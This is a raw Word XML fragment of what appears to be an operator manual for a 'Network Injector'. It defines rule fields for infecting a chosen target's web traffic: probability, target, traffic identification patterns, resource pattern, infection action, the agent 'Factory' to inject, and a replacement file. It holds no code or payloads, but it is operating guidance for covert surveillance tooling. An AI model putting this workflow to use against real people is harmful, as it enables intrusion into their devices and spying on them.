                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">gent </w:t>
            </w:r>
            <w:r w:rsidR="00AF6B3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(Factory) </w:t>
            </w:r>
            <w:r w:rsidR="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">defined </w:t>
            </w:r>
            <w:r w:rsidR="006364C1" w:rsidRPr="006364C1">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>in the rule.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="001633C0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Probability</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the p</w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>robability (percent</w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>age</w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>) of applying the rule after the first infected resource.</w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0%</w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> means that </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">after infecting the first resource, </w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Network Injector will no longer apply this</w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rule.</w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>100%</w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> means that </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">after infecting the first resource, </w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Network Injector will always apply this</w:t>
            </w:r>
            <w:r w:rsidR="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001633C0" w:rsidRPr="001633C0">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rule.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00E62E16">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00B5385A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the name of the Target to be infected.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00150BDA">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ident</w:t>
            </w:r>
            <w:r w:rsidRPr="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA" w:rsidRPr="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target's HTTP connection identification method.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00150BDA" w:rsidRPr="00F359AE" w:rsidRDefault="0010013A" w:rsidP="00150BDA">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">See page 51 </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00150BDA">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>User pattern</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA" w:rsidRPr="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target's traffic identification method. The format depends on the type of</w:t>
            </w:r>
            <w:r w:rsidR="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA" w:rsidRPr="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA" w:rsidRPr="00150BDA">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ident</w:t>
            </w:r>
            <w:r w:rsidR="00150BDA" w:rsidRPr="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00150BDA" w:rsidRPr="00150BDA">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>selected.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B266B5" w:rsidRPr="00F359AE" w:rsidRDefault="0010013A" w:rsidP="00B266B5">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">See page 51 </w:t>
            </w:r>
            <w:r w:rsidR="00B266B5" w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00B266B5" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00F15A53">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Resource pattern</w:t>
            </w:r>
            <w:r w:rsidR="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the i</w:t>
            </w:r>
            <w:r w:rsidR="00F15A53" w:rsidRPr="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dentification method of the resource to be injected, applied to the Web resource</w:t>
            </w:r>
            <w:r w:rsidR="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F15A53" w:rsidRPr="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">URL. The format depends on the type of </w:t>
            </w:r>
            <w:r w:rsidR="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00F15A53" w:rsidRPr="00F15A53">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidR="00F15A53" w:rsidRPr="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">] </w:t>
            </w:r>
            <w:r w:rsidR="00F15A53" w:rsidRPr="00F15A53">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>selected.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B266B5" w:rsidRPr="00F359AE" w:rsidRDefault="00B266B5" w:rsidP="00B266B5">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>See page</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="0010013A">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 52-53-54-55 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00850F87">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidR="00850F87">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the i</w:t>
            </w:r>
            <w:r w:rsidR="00850F87" w:rsidRPr="00850F87">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">nfection method that will be applied to the resource indicated in </w:t>
            </w:r>
            <w:r w:rsidR="00850F87">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00850F87" w:rsidRPr="00850F87">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Resource pattern</w:t>
            </w:r>
            <w:r w:rsidR="00850F87">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ].</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B266B5" w:rsidRPr="00F359AE" w:rsidRDefault="00B266B5" w:rsidP="00B266B5">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>See page</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidR="0010013A">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 52-53-54-55 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F359AE">
              <w:rPr>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more information.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00AF4DC4">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Factory</w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Factory to be injected into the selected Web resource and is available for all actions except REPLACE.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00171249">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00171249" w:rsidRPr="00F43991" w:rsidRDefault="00171249" w:rsidP="00AF4DC4">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is the file to be replaced with the one in the [ </w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4" w:rsidRPr="00AF4DC4">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Resource pattern</w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] and is available for </w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4" w:rsidRPr="00AF4DC4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">REPLACE </w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4" w:rsidRPr="00AF4DC4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ction only</w:t>
            </w:r>
            <w:r w:rsidR="00AF4DC4">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00171249" w:rsidRDefault="00171249" w:rsidP="00FC7C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E68CA" w:rsidRDefault="007E68CA" w:rsidP="00FC7C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E68CA" w:rsidRDefault="007E68CA" w:rsidP="00FC7C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Once a new rule is created, you’ve to push it to the Network Injector by clicking the button Apply rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007212BC" w:rsidRDefault="007212BC" w:rsidP="00FC7C23">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007212BC" w:rsidRDefault="007212BC" w:rsidP="007212BC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="609600" cy="514350"/>
            <wp:effectExtent l="0" t="0" r="0"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p w:rsidR="007212BC" w:rsidRDefault="007212BC" w:rsidP="007212BC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005448D4" w:rsidRPr="00736675" w:rsidRDefault="005448D4" w:rsidP="00C87FEC">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc372642501"/>
      <w:r w:rsidRPr="00736675">
